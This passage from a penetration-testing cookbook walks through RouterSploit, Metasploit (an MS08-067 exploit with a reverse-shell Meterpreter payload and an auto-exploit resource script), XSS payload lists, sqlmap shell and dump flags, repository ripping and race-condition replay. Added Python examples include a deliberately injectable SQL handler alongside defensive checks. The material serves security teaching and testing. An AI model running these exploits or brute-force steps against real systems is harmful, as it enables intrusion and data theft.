[Screenshot: alert details. AT A GLANCE: Classification: Input Validation Error; Resource: /comment.php; Parameter: name; Method: POST; Risk. REQUEST: POST /comment.php with an XSS probe in the name parameter. DISCUSSION: "Cross-site scripting (XSS) is a class of vulnerabilities affecting web applications that can result in security controls implemented in browsers being circumvented. When a browser visits a page on a website, script code originating in the website domain can access and manipulate the DOM (document object model), a representation of ... visiting the same website. This would circumvent the browser same-origin policy because the browser has no way to distinguish authentic ..."]


10. Similar to Burp, Vega also has a proxy feature, where we can intercept and analyze the requests 
manually too! 

11. We can edit and replay the requests to perform a manual check: 


[Screenshot: the Vega proxy Website View (Intercept, Proxy Status) for testphp.vulnweb.com, listing /AJAX, /Flash, /images, /Mod_Rewrite_Shop, artists.php, categories.php, index.php, showxml.php, titles.php and styles.css; the Request pane shows GET /AJAX/ HTTP/1.1, Accept-Encoding: gzip,deflate, Host: testphp.vulnweb.com, Connection: Keep-Alive, User-Agent: UserAgent]














Exploring SearchSploit 


SearchSploit is a command-line tool that allows us to search and browse all the exploits available at 
exploitdb. 


How to do it... 


1. To view help, we type the following command: 


    searchsploit -h 


The following screenshot shows the output of the preceding command: 


[Screenshot: searchsploit -h output: Usage: searchsploit [options] term1 [term2] ... [termN]; options include a case-sensitive search (the default is insensitive), showing this help, searching just the title, verbose output (title lines are allowed to overflow their column), showing URLs to Exploit-DB.com rather than the local path, --colour to disable colour highlighting, and --id to display the EDB-ID value rather than the local path]





2. We can perform a search by simply entering the keyword, and if we want to copy the exploit into our 
working directory, we use this: 

    searchsploit -m exploitdb-id 


The following screenshot is an example of the preceding command: 





Exploiting routers with RouterSploit 


RouterSploit is a router exploitation framework that is designed especially for embedded devices. It 
consists of three main modules: 


• exploits: This contains a list of all the publicly available exploits 
• creds: This is used for testing logins for different devices 
• scanners: This is used for checking a particular exploit against a particular device 


Getting ready 


Before we begin, we will have to install RouterSploit in Kali; unfortunately, it does not come with the 
official installation of the OS. RouterSploit installation is very simple, just like we installed some tools in 
the beginning of the book. 


How to do it... 


1. We use the following command to clone the GitHub repository: 

    git clone https://github.com/reverse-shell/routersploit 

2. We go to the directory using the cd routersploit command and run the file as follows: 

    ./rsf.py 


The following screenshot shows the output of step 1: 


[Screenshot: git clone https://github.com/reverse-shell/routersploit; Cloning into 'routersploit'...; remote: Counting objects: 2972, done; remote: Total 2972; Receiving objects: 100% (2972/2972)]





3. To run an exploit against a router, we simply type this: 


    use exploits/routername/exploitname 
The following screenshot shows an example of the preceding command: 


[Screenshot: rsf > use exploits/dlink/dcs_930l_auth_rce]





4. Now we see the options that are available for the exploit we chose. We use the following command: 

    show options 


The following screenshot shows the output of the preceding command: 


[Screenshot: rsf > show options; Target options (Name, Current settings, Description): target, port; Module options: the username and password to log in with]





5. We set the target with the following command: 


set target 192.168.1.1 


The following screenshot shows the output of the preceding command: 





6. To exploit, we simply type exploit or run: 

[Screenshot: rsf > run; Running module...; Exploit failed - target seems to be not vulnerable]


Using the scanners command 


The following steps demonstrate the use of scanners: 


1. To scan a Cisco router, we use the following command: 


    use scanners/cisco_scan 


2. We now check for other options: 


    show options 


The following screenshot shows the output of the preceding command: 


[Screenshot: rsf > show options for scanners/cisco_scan; Target options (Name, Current settings, Description): target (IP address e.g. 192.168.1.1), port; Module options: threads]





3. To run a scan against a target, we first set the target: 

    set target x.x.x.x 


The following screenshot shows the output of the preceding command: 





4. Now we run it, and it will show all the exploits that the router is vulnerable to: 


[Screenshot: rsf > run; each tested module (multi_path_traversal, path traversal, disclosure, ...) is reported as "is not vulnerable", the elapsed time in seconds is printed, and the summary says the target is not vulnerable to any exploits]





Using creds 


This can be used to test default password combinations on the services via the dictionary attack: 
1. We use the creds command to run the dictionary attack on various services: 


    use creds/telnet_bruteforce 


The following screenshot shows the output of the preceding command: 


[Screenshot: root@kali:~/routersploit, rsf > use creds/telnet_bruteforce]





2. Next, we look at the options: 


    show options 


The following screenshot shows the output of the preceding command: 


[Screenshot: rsf > show options; Target options (Name, Current settings, Description): target (IP address or file with target:port (file://)), port (target port)]





3. Now we set the target IP: 


    set target x.x.x.x 


4. We let it run, and it will show us any login it finds. 


[Screenshot: run output, with each worker thread reporting "thread is starting..."]





Using Metasploit 


Metasploit is the most widely used open source tool for pentesting. It was first developed by HD Moore 
in 2001 in Perl; later, it was completely rewritten in Ruby and then it was acquired by Rapid7. 


Metasploit contains a collection of exploits, payloads, and encoders, which can be used to identify and 
exploit vulnerabilities during a pentest project. In this chapter, we will cover a few recipes that will 
enable the use of the Metasploit Framework (MSF) more efficiently. 


How to do it... 


The following steps demonstrate the use of MSF: 


1. Start the MSF by typing the following command: 


    msfconsole 


The following screenshot shows the output of the preceding command: 


[Screenshot: msfconsole start-up banner, ending with a "Tired of typing ... Learn more on http://metasploit.com" hint]


2. To search for an exploit, we type this: 


    search exploit_name 


The following screenshot shows the output of the preceding command: 


(screenshot: the matching modules, for example exploit/windows/smb/ms08_067_netapi, disclosed 2008-10-28, ... Server Service Relative Path Stack Corruption) 


3. To use an exploit, we type this: 


use exploit/path/to/exploit 


The following screenshot shows the output of the preceding command: 


(screenshot: the prompt changes to show the loaded module, ending in netapi) 





4. Next, we look at the options by typing the following: 


show options 


5. Here, we will need to set the payload, the target IP, and the local host and port we want for the back connection. 
We set the target using the following: 


set RHOST x.x.x.x 


6. We set the payload with this: 


set payload windows/meterpreter/reverse_tcp 


7. Next, we set the LHOST and LPORT on which we want to receive the connection: 


set lhost x.x.x.x 
set lport 4444 


8. Now we run the exploit command: 


exploit 


9. Once it is successfully exploited, we will see a Meterpreter session: 


(screenshot: a Meterpreter session opened in the terminal) 





Although we used only Windows reverse_tcp here, Metasploit has a lot of other payloads 
depending on the backend OS or web application used. A complete list of payloads can be 
found at https://www.offensive-security.com/metasploit-unleashed/msfpayload/. 


Automating Metasploit 


Metasploit supports automation in several ways. One such way, which we cover here, is the resource script. 


A resource script is basically a set of msfconsole commands that run automatically when the script is loaded. 
Metasploit already ships with a set of prebuilt scripts that prove most useful in a corporate pentesting 
environment. The complete list of available scripts can be seen in the /usr/share/metasploit-framework/scripts/resource 
directory: 


(screenshot: ls in /usr/share/metasploit-framework/scripts/resource, showing scripts such as auto_pass_the_hash.rc, auto_win32_multihandler.rc, bap_all.rc, bap_dryrun_only.rc, basic_discovery.rc, fileformat_generator.rc, mssql_brute.rc, multi_post.rc, oracle_login.rc, port_cleaner.rc, portscan.rc, run_all_post.rc and wmap_autotest.rc) 





How to do it... 


The following steps demonstrate the automation of Metasploit: 


1. We start Metasploit using the following command: 


msfconsole 


The preceding command's output is shown in the following screenshot: 


root@kali:~# msfconsole 

(screenshot: msfconsole starts and prints its ASCII-art banner) 





2. Some scripts require RHOSTS to be set globally, so we set RHOSTS using the following command: 


set RHOSTS 172.18.0.0/24 


The preceding command's output is shown in the following screenshot: 





3. Now we run the script using the following command: 


resource /usr/share/metasploit-framework/scripts/resource/basic_discovery.rc 


4. This script will do a basic host discovery scan on the subnet provided: 


(screenshot: basic_discovery.rc is loaded, its auxiliary modules run as background jobs, and Nmap is launched with options such as -n -PN) 





Writing a custom resource script 


In the following recipe, we will look at how to write a basic script. 


How to do it... 


Follow the given steps for writing a basic script: 


1. We open up any editor (nano, Leafpad, and so on). 
2. Here, we type all the commands we would want MSF to execute: 


use exploit/windows/smb/ms08_067_netapi 
set payload windows/meterpreter/reverse_tcp 
set RHOST 192.168.15.15 
set LHOST 192.168.15.20 
set LPORT 4444 
exploit -j 


3. We save the script with a .rc extension: 


(screenshot: the same six commands in a text editor, about to be saved with a .rc extension) 








4. Now we start msfconsole and load the script with the resource command, which automatically exploits the machine: 


(screenshot: msfconsole reads the script line by line, setting RHOST, LHOST 192.168.15.20 and LPORT 4444, and exploit -j starts the exploit as a background job) 





A resource script is just one way of automating Metasploit; you can learn about other 
ways of automating Metasploit in this article at https://community.rapid7.com/community/metasploit/blog/2011/12/08/six-ways-to-automate-metasploit. 


Databases in Metasploit 


In Kali Linux, we will have to set up a database before we use the database functionality. 


How to do it... 


The following steps demonstrate the setting up of a database: 


1. First, we start the postgresql server using the following command: 


service postgresql start 


The following screenshot shows the output of the preceding command: 


(screenshot: service postgresql start) 





2. Then, we create the database and initialize it: 


msfdb init 


3. Once this is done, we load msfconsole. Now we can create and manage workspaces in Metasploit. A 
workspace can be considered a space where we can save all our Metasploit data with 
categorizations. To set up a new workspace, we use the following command: 


workspace -a workspacename 
The following screenshot shows the output of the preceding command: 


msf > workspace -a demopackt 
Added workspace: demopackt 
msf > 





4. To see all the commands related to the workspace, we can execute this: 


workspace -h 


5. Now that we have our database and workspace set up, we can use various commands to interact with 
the database. 
6. To import an existing Nmap scan into our database, we use the following command: 


db_import path/to/nmapfile.xml 


The following screenshot shows the output of the preceding command: 


msf > db_status 
[*] postgresql connected to msf3 
msf > db_import /root/Desktop/msf_ 





7. Once the import is complete, we can view the hosts using the following command: 


hosts 


The following screenshot shows the output of the preceding command: 





8. To view only the IP address and OS type, we use the following command: 


hosts -c address,os_flavor 


The following screenshot shows the output of the preceding command: 


(screenshot: the hosts table reduced to the address and os_flavor columns) 





9. Now suppose we want to perform a TCP auxiliary scan. We can set all these hosts as RHOSTS for an 
auxiliary module too. We do this using the following command: 


hosts -c address,os_flavor -R 
The following screenshot shows the output of the preceding command: 


(screenshot: hosts -c address,os_flavor -R lists the hosts and sets RHOSTS to them) 





10. As RHOSTS has been set, it can be used across Metasploit in any module we need. 
11. Let's look at one more example where our imported Nmap scan already has all the data we need. We 
can use the following command to list all the services in the database: 


services 


12. To see only those services that are up, we can use the -u switch: 


services -u 


(screenshot: the services table filtered to those that are up, with columns host, port, proto, name, state and info; entries include 443/tcp https and www services, and info strings such as Apache-Coyote/1.1, Microsoft-IIS/8.0, Microsoft-IIS/8.5, Microsoft-HTTPAPI/2.0, SonicWALL, Microsoft DNS, Windows 10, IPMI-2.0, MySQL 5.5.47-0ubuntu0.14.04.1 and a VMware authentication banner) 
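The Nmap XML that db_import reads has a simple structure, and parsing it yourself is a good way to understand what the hosts, services -u and hosts -R commands are showing you. The following Python script is an added example and is not part of the book or of Metasploit; it embeds a small constructed Nmap XML document (not a real scan result) and reproduces those three views of the data with helper names of its own (parse_nmap_xml, up_services, rhosts_from_hosts).

```python
import xml.etree.ElementTree as ET

# Constructed sample Nmap XML (not a real scan result), shaped like `nmap -sV -O -oX scan.xml` output:
# one live host with an open and a closed port, and one host that did not respond.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -O -oX scan.xml 192.168.56.0/24">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.56.10" addrtype="ipv4"/>
    <hostnames><hostname name="web01.example.test" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="443">
        <state state="open" reason="syn-ack"/>
        <service name="https" product="Apache httpd" version="2.4.29"/>
      </port>
      <port protocol="tcp" portid="8080">
        <state state="closed" reason="reset"/>
        <service name="http-proxy"/>
      </port>
    </ports>
    <os><osmatch name="Linux 4.15 - 5.6" accuracy="95"/></os>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.168.56.11" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

def parse_nmap_xml(xml_text):
    """Return (hosts, services) in roughly the shape db_import stores them.

    hosts:    dicts with address, name, state, os_flavor      (what `hosts` prints)
    services: dicts with host, port, proto, name, state, info (what `services` prints)
    """
    root = ET.fromstring(xml_text)
    hosts, services = [], []
    for host in root.findall("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            addr_el = host.find("address")          # IPv6-only or MAC-only entries
        address = addr_el.get("addr") if addr_el is not None else None
        status = host.find("status")
        hostname = host.find("hostnames/hostname")
        osmatch = host.find("os/osmatch")           # first match is Nmap's best guess
        hosts.append({
            "address": address,
            "name": hostname.get("name") if hostname is not None else "",
            "state": status.get("state") if status is not None else "unknown",
            "os_flavor": osmatch.get("name") if osmatch is not None else "",
        })
        for port in host.findall("ports/port"):
            pstate = port.find("state")
            svc = port.find("service")
            product = [svc.get("product"), svc.get("version")] if svc is not None else []
            services.append({
                "host": address,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "name": svc.get("name", "") if svc is not None else "",
                "state": pstate.get("state") if pstate is not None else "unknown",
                "info": " ".join(p for p in product if p),
            })
    return hosts, services

def up_services(services):
    """What `services -u` shows: only ports whose state is open."""
    return [s for s in services if s["state"] == "open"]

def rhosts_from_hosts(hosts):
    """What `hosts -R` does: an RHOSTS value built from the live hosts (RHOSTS accepts a space-separated list)."""
    return " ".join(h["address"] for h in hosts if h["state"] == "up" and h["address"])

if __name__ == "__main__":
    hosts, services = parse_nmap_xml(SAMPLE_NMAP_XML)
    for h in hosts:
        print(f"{h['address']:<16}{h['state']:<8}{h['os_flavor']}")
    for s in up_services(services):
        print(f"{s['host']}:{s['port']}/{s['proto']}  {s['name']}  {s['info']}")
    print("RHOSTS =>", rhosts_from_hosts(hosts))
```

Pointing parse_nmap_xml at a real -oX file gives you the same inventory without a database, which is handy for diffing two scans of the same subnet in a report.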





Web App Exploitation — Beyond OWASP Top 10 


In this chapter, we will cover the following recipes: 


Exploiting XSS with XSS Validator 
Injection attacks with sqlmap 
Owning all .svn and .git repositories 
Winning race conditions 
Exploiting JBoss with JexBoss 
Exploiting PHP Object Injection 
Backdoors using web shells and meterpreters 


Introduction 


In the OWASP Top 10, we usually see the most common way of finding and exploiting vulnerabilities. In 
this chapter, we will cover some of the uncommon cases one might come across while hunting for bugs in 
a web application. 


Exploiting XSS with XSS Validator 


While XSS is already detected by various tools such as Burp, Acunetix, and so on, XSS Validator comes 
in handy: it is a Burp Intruder extension that has been designed to automatically validate XSS 
vulnerabilities. 


It is based on SpiderLabs' blog post at http://blog.spiderlabs.com/2013/02/server-site-xss-attack-detection-with-modsecurity-and-phantomjs.html. 


Getting ready 


To use the tool in the following recipe, we will need to have SlimerJS and PhantomJS installed on our 
machines. 


How to do it... 


The following steps demonstrate the XSS Validator: 


1. We open up Burp and switch to the Extender tab: 


(screenshot: the Extender tab with the BApp Store, with its Refresh list and Manual install... buttons) 





2. We then install the XSS Validator extender: 


(screenshot: the XSS Validator entry in the BApp Store. Its description says the extension sends responses to a locally running XSS-Detector server; before starting an attack the detector servers are started with phantomjs xss.js & and slimerjs slimer.js &, the server listens on port 8093 by default, and the Grep Phrase from the xssValidator tab indicates successful execution of an XSS payload. The xss-detector directory ships example pages such as basic-xss.php, bypass-regex.php and dom-xss.php. Requires Java version 7. Author: John Poulin, version 1.3.0, with an Install button.) 


3. Once the installation is done, we will see a new tab in the Burp window titled XSS Validator: 


(screenshot: the XSS Validator tab. It describes xssValidator as an Intruder extension with a customizable list of payloads that couples with the PhantomJS and SlimerJS scriptable browsers to validate cross-site scripting vulnerabilities. Getting started: download the latest xss-detectors from the git repository; start the phantom server with phantomjs xss.js; create a new Intruder tab and select Extension-generated payload; under the Intruder Options tab add the Grep Phrase to the Grep - Match panel; successful attacks are denoted by the presence of the Grep Phrase. Created by John Poulin (@forced-request), version 1.3.0.) 


4. Next, we install PhantomJS and SlimerJS; this can be done on Kali with a few simple commands. 
5. We download the PhantomJS archive from the internet using wget: 


sudo wget https://bitbucket.org/ariya/phantomjs/downloads/phantomjs-1.9.8-linux-x86_64.tar.bz2 


6. We extract it using the following command: 


tar jxvf phantomjs-1.9.8-linux-x86_64.tar.bz2 


The following screenshot shows the folder into which the preceding command extracts PhantomJS: 


(screenshot: ls in /usr/local/share/phantomjs shows bin, ChangeLog, LICENSE.BSD, README.md and third-party.txt, followed by cd bin/ and ls) 





7. Now we can browse the folder using cd, and the easiest way is to copy the PhantomJS executable to 
/usr/local/bin: 


cp phantomjs /usr/local/bin 


The following screenshot shows the output of the preceding command: 


bin# cp phantomjs /usr/local/bin/ 
bin# phantomjs -v 


8. To verify, we can type the phantomjs -v command in the Terminal, and it will show us the version. 
9. Similarly, to install SlimerJS, we download it from the official website: 
http://slimerjs.org/download.html. 
10. We first install the dependencies using the following command: 


sudo apt-get install libc6 libstdc++6 libgcc1 xvfb 


11. Now we extract the files using this: 


tar jxvf slimerjs-0.8.4-linux-x86_64.tar.bz2 


12. We then browse the directory and simply copy the SlimerJS executable to /usr/local/bin: 


(screenshot: ls in /usr/local/share/slimerjs-0.10.2 shows application.ini, chrome, LICENSE, omni.ja, README.md, slimerjs, slimerjs.bat, slimerjs.py and vendors) 


13. Then, we execute the following command: 


cp slimerjs /usr/local/bin/ 


The following screenshot shows the output of the preceding command: 





slimerjs-0.10.2# cp slimerjs /usr/local/bin/ 


14. Now we need to navigate to the XSS Validator folder. 
15. We then need to start the PhantomJS and SlimerJS servers using the following commands: 


phantomjs xss.js & 
slimerjs slimer.js & 


16. Once the servers are running, we head back to the Burp window. In the XSS Validator tab on the 
right-hand side, we will see a list of payloads the extender will test on the request. We can manually 
enter our own payloads as well: 


(screenshot: the Payloads panel. Custom payloads can be defined here, separated by line breaks; {JAVASCRIPT} placeholders define the location of the JavaScript function, and {EVENTHANDLER} placeholders define the location of JavaScript events such as onmouseover, which are tested via the scriptable browsers. The default list contains templates such as <script>{JAVASCRIPT}</script>, "><script>{JAVASCRIPT}</script>, <SCRIPT>{JAVASCRIPT};</SCRIPT>, split-tag variants such as <scri<script>pt>{JAVASCRIPT};</scr</script>ipt>, <img src="1" onerror="{JAVASCRIPT}">, onload="{JAVASCRIPT}" and <IFRAME SRC="f" onerror="{JAVASCRIPT}"></IFRAME>.) 








17. Next, we capture the request we need to validate XSS on. 


18. We select the Send to Intruder option: 






(screenshot: the right-click menu on the captured request, showing Send to Spider, Do an active scan, Do a passive scan and Send to Intruder) 





19. Then, we switch to the Intruder window, and under the Positions tab, we set the position where we 
want our XSS payloads to be tested. The value surrounded by the § markers is where the payloads will be 
inserted during the attack: 


(screenshot: the Positions tab with Attack type: Sniper and the parameter value marked as the payload position) 





20. In the Payloads tab, we select the Payload type as Extension-generated: 


(screenshot: the Payloads tab, Payload Sets: Payload set 1, Payload type Extension-generated, with payload count and request count shown as unknown) 


21. In Payload Options, we click on the Select generator... and choose XSS Validator Payloads: 


(screenshot: Payload Options [Extension-generated] with the Select generator... dialog open; Extension payload generator is set to XSS Validator Payloads, with OK and Cancel buttons) 





22. Next, we switch to the XSS Validator tab and copy Grep Phrase; this phrase can be customized as 
well: 


(screenshot: Grep Phrase fy7sdufsuidfhuisdf) 





23. Next, we switch to the Options tab in the Intruder and add the copied phrase in the Grep - Match: 





(screenshot: the Grep - Match settings, which flag result items containing specified expressions; the phrase fy7sdufsuidfhuisdf has been added to the list, with Match type: Simple string) 





24. We click on Start attack, and we will see a window pop up: 


(screenshot: the Intruder results window, Filter: Showing all items, with columns Request, Payload, Status, Error, Timeout, Length, the Grep Phrase and Comment. Payloads such as <script>alert(299792458)</script>, <script>confirm(299792458)</script>, "><script>prompt(299792458)</script> and <<SCRIPT>console.log(299792458)</SCRIPT> return status 200, and the Grep Phrase column is ticked for the ones that executed) 


25. Here, we will see that the requests with a check mark in our Grep Phrase column have been 
successfully validated: 





Injection attacks with sqlmap 


The sqlmap tool is an open source tool built in Python, which allows the detection and exploitation of SQL 
injection attacks. It has full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft 
Access, IBM Db2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB, and Informix databases. In this 
recipe, we will cover how to use sqlmap to test and exploit SQL injection. 


How to do it... 


The following are the steps to use sqlmap: 


1. We first take a look at the help of sqlmap for a better understanding of its features. This can be done 
using the following command: 


sqlmap -h 


The following screenshot shows the output for the preceding command: 


root@kali:~# sqlmap -h 

(screenshot: the sqlmap help. Usage: python sqlmap [options]. Options include -h (show basic help message and exit), -hh (show advanced help message and exit), --version (show program's version number and exit) and -v VERBOSE (verbosity level, default 1). Under Target, at least one of these options has to be provided to define the target(s): -u URL, --url=URL (target URL, e.g. "http://www.site.com/vuln.php?id=1") and -g GOOGLEDORK (process Google dork results as target URLs).) 





2. To scan a URL, we use the following command: 


sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" 


3. Once an injection has been detected, we can choose yes (Y) to skip the test payloads specific to other DBMSes: 


it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y 





4. Once the injection has been detected, we can list the database names using the --dbs flag: 





5. We have the databases now; similarly, we can use flags such as --tables and --columns to get table 
names and column names: 


web application technology: Nginx, PHP 5.3.10 
back-end DBMS: MySQL 5.0.12 
available databases [2]: 
[*] acuart 
[*] information_schema 

[*] shutting down at 00:06:16 


6. To check whether the user is a database administrator, we can use the --is-dba flag: 





root@kali:~# sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --is-dba 


7. The sqlmap command has a lot of flags. We can use the following table to see the different types of 
flags and what they do: 


Flag                        Operation 
--tables                    Dumps all table names 
-T                          Specifies a table name to perform an operation on 
--os-cmd                    Executes an operating system command 
--os-shell                  Prompts a command shell to the system 
(flag not legible)          Specifies a filename to run the SQL test on 
--dump-all                  Dumps everything 
--tamper                    Uses a tamper script 
--eta                       Shows the estimated time remaining to dump data 
--dbms=MySQL,MSSQL,Oracle   Manually chooses the database type and performs the injection for those database types only 
--proxy                     Specifies a proxy 
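What sqlmap is exploiting in this recipe is a query that has the request parameter pasted into its SQL text. The following Python example is added here and is not part of the book or of sqlmap; it uses an in-memory SQLite table with constructed rows (named after the artists.php?artist= parameter, not real data) to show the vulnerable handler next to its parameterized form, and the always-true/always-false probe that boolean-based detection relies on, so you can see why one handler gets flagged and the other does not. The function names are this example's own.

```python
import sqlite3

def make_db():
    """Constructed in-memory table (not data from the page), named after the artists.php?artist= parameter."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE artists (artist_id INTEGER PRIMARY KEY, aname TEXT)")
    conn.executemany("INSERT INTO artists VALUES (?, ?)",
                     [(1, "artist_a"), (2, "artist_b"), (3, "artist_c")])
    conn.commit()
    return conn

def artist_vulnerable(conn, artist):
    """The bug sqlmap finds: the request parameter is pasted straight into the SQL text."""
    sql = "SELECT artist_id, aname FROM artists WHERE artist_id = " + artist
    return conn.execute(sql).fetchall()

def artist_safe(conn, artist):
    """Hardened form: the value is validated, then bound as a parameter, so it can never become SQL."""
    try:
        artist_id = int(artist)          # the field is a numeric id, so anything else is rejected outright
    except (TypeError, ValueError):
        return []
    return conn.execute("SELECT artist_id, aname FROM artists WHERE artist_id = ?",
                        (artist_id,)).fetchall()

def looks_injectable(query_fn, conn, value="1"):
    """The boolean-based inference sqlmap starts with: append an always-true and an always-false
    condition to the value; if the two responses differ, the input is reaching the SQL parser."""
    baseline = query_fn(conn, value)
    true_case = query_fn(conn, value + " AND 1=1")
    false_case = query_fn(conn, value + " AND 1=2")
    return true_case == baseline and false_case != baseline

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, artist=1       :", artist_vulnerable(conn, "1"))
    print("vulnerable, artist=1 OR 1=1:", artist_vulnerable(conn, "1 OR 1=1"))   # every row comes back
    print("safe, artist=1 OR 1=1      :", artist_safe(conn, "1 OR 1=1"))         # rejected: []
    print("vulnerable looks injectable:", looks_injectable(artist_vulnerable, conn))
    print("safe looks injectable      :", looks_injectable(artist_safe, conn))
```

The same two handlers are what --dbs and --is-dba go on to lean on: once the true/false probe shows the input reaches the parser, everything sqlmap enumerates afterwards is built from that one missing parameter binding.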





See also 


- The Backdoors using web shells recipe 
- The Backdoors using meterpreters recipe 


Owning all .svn and .git repositories 


dvcs-ripper is a tool used to rip the metadata of version control systems such as SVN, Git, Mercurial (hg) and Bazaar. The tool 
is built in Python and is pretty simple to use. In this recipe, you will learn how to use the tool to rip the 
repositories. 


This vulnerability exists because, most of the time when using a version control system, developers 
deploy the repository metadata (the .git or .svn folder) to production. Leaving these folders web-accessible allows an attacker to download the whole source 
code. 


How to do it... 


The following steps demonstrate the use of dvcs-ripper: 


1. We download dvcs-ripper from GitHub using: 


git clone https://github.com/kost/dvcs-ripper.git 


2. We browse the dvcs-ripper directory: 


# cd /root/dvcs-ripper/ 


# 





3. To rip a Git repository, the command is very simple: 


rip-git.pl -v -u http://www.example.com/.git/ 


4. We let it run and then we should see a .git folder created, and in it, we should see the source code: 


(screenshot: the ripped source tree, containing files and folders such as agreements, akamai, apple-app-site-association, assets, common.php, css, dummy.php, faq_sample.csv, favicon.ico, fonts, images, JSON_Logs, newupload.csv, test_pdf and var) 


5. Similarly, we can use the following command to rip SVN: 


rip-svn.pl -v -u http://www.example.com/.svn/ 
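The fix for what this recipe finds is on the deployment side: never ship repository metadata to the web root, and verify that with a check in CI or on the server itself. The following Python script is an added example and is not from the book or from dvcs-ripper; it walks a document root for the metadata directories that rip-git.pl and rip-svn.pl depend on. The sample document root it builds in a temporary directory is constructed for the demonstration, and the function names are this example's own.

```python
import os
import tempfile

# Repository metadata directories that must never be reachable through the web server.
VCS_DIRS = {".git", ".svn", ".hg", ".bzr"}

def find_exposed_vcs_dirs(docroot):
    """Walk a document root and return the VCS metadata directories inside it, as docroot-relative paths.

    Any hit means a tool such as rip-git.pl or rip-svn.pl could pull the full source tree over HTTP.
    """
    exposed = []
    for dirpath, dirnames, _files in os.walk(docroot):
        for name in list(dirnames):
            if name in VCS_DIRS:
                rel = os.path.relpath(os.path.join(dirpath, name), docroot)
                exposed.append(rel.replace(os.sep, "/"))
                dirnames.remove(name)  # no need to descend into the repository itself
    return sorted(exposed)

def build_sample_docroot():
    """Constructed sample deployment (not from the page): a site whose .git and a nested .svn went to production."""
    root = tempfile.mkdtemp(prefix="docroot_")
    os.makedirs(os.path.join(root, ".git", "objects"))
    with open(os.path.join(root, ".git", "HEAD"), "w") as fh:
        fh.write("ref: refs/heads/master\n")
    os.makedirs(os.path.join(root, "admin", ".svn"))
    os.makedirs(os.path.join(root, "css"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    return root

def audit(docroot):
    """CI-style verdict: 0 when the document root is clean, 1 when repository metadata was found."""
    hits = find_exposed_vcs_dirs(docroot)
    for hit in hits:
        print(f"exposed repository metadata: {hit}")
    return 1 if hits else 0

if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_docroot()
    sys.exit(audit(target))
```

Run with the web root as its argument it fails the build or the deploy step whenever such a folder slipped through; as a second layer, the web server can refuse to serve those paths at all (in nginx, for example, a location block matching /\.(git|svn|hg|bzr) that returns 404), which is what stops rip-git.pl even when the folder is present.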


Winning race conditions 


Race conditions occur when two or more concurrent actions operate on the same data in a multithreaded web 
application. The result is unexpected behaviour whenever the timing of one action affects the outcome of 
another. 


Examples of applications with a race condition vulnerability include one that allows the transfer of credit 
from one user to another, or one that allows a voucher code to be added for a discount; in both cases the 
race may allow an attacker to use the same credit or code multiple times. 


How to do it... 


We can perform a race condition attack using Burp's Intruder as follows: 


1. We select the request and click on Send to Intruder: 


(screenshot: the right-click menu on the request, showing Send to Spider, Do an active scan, Do a passive scan, Send to Intruder, Send to Repeater, Send to Sequencer, Send to Comparer and Send to Decoder) 





2. We switch to the Options tab and set the number of threads we want; 20 to 25 is usually enough: 

















(screenshot: the Request Engine settings, which control the engine used for making HTTP requests when performing attacks: Number of threads, Number of retries on network failure 3, Pause before retry 2000 milliseconds, Throttle fixed at 0, Start time Immediately) 





3. Then, in the Payloads tab, we choose Null payloads in Payload type as we want to replay the same 
request: 





(screenshot: Payload Sets with Payload set 1, Payload type Null payloads, payload count 50 and request count 50; under Payload Options [Null payloads], which generates payloads whose value is an empty string, Generate 50 payloads is selected rather than Continue indefinitely) 


4. Then, in the Payload Options, we choose the number of times we want the request to be replayed. 
5. Since we don't really know how the application will behave, we cannot perfectly guess the number 
of times we need to replay the request. 
6. Now, we click on Start attack. If the attack is successful, we should see the desired result. 
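To see why replaying one request from 20 to 25 threads can work, it helps to run the race locally. The following Python example is added here and is not from the book or from Burp; it models a single-use voucher (a constructed example, not any real application), replays the redemption from many threads the way Intruder with Null payloads does, and contrasts the check-then-act version with one that makes the check and the update a single critical section. A threading.Barrier forces the worst-case interleaving so the demonstration is deterministic; the class and function names are this example's own.

```python
import threading

class VoucherWallet:
    """Constructed model (not any real application): one single-use discount code and a credit balance."""

    def __init__(self, code="SAVE10", value=10):
        self.code = code
        self.value = value
        self.redeemed = False
        self.credit = 0
        self._lock = threading.Lock()
        self.barrier = None  # set by simulate() so every thread passes the check before any of them acts

    def redeem_racy(self, code):
        """Check-then-act with nothing holding the two steps together: the pattern replayed requests exploit."""
        if code != self.code or self.redeemed:          # 1. check
            return False
        if self.barrier is not None:
            self.barrier.wait()                          # worst case: all threads have passed the check
        self.credit += self.value                        # 2. act
        self.redeemed = True
        return True

    def redeem_atomic(self, code):
        """Same logic, but the check and the update happen inside one critical section."""
        with self._lock:
            if code != self.code or self.redeemed:
                return False
            self.credit += self.value
            self.redeemed = True
            return True

def simulate(method_name, requests=25):
    """Replay one redemption request from `requests` threads at once and report what the app granted."""
    wallet = VoucherWallet()
    if method_name == "redeem_racy":
        # every thread calls with the valid code, so all of them reach the barrier
        wallet.barrier = threading.Barrier(requests)
    redeem = getattr(wallet, method_name)
    results, results_lock = [], threading.Lock()

    def worker():
        granted = redeem("SAVE10")
        with results_lock:
            results.append(granted)

    threads = [threading.Thread(target=worker) for _ in range(requests)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return {"requests": requests, "granted": sum(results), "credit": wallet.credit}

if __name__ == "__main__":
    print("racy:  ", simulate("redeem_racy"))     # 25 requests, 25 granted
    print("atomic:", simulate("redeem_atomic"))   # 25 requests, 1 granted, credit 10
```

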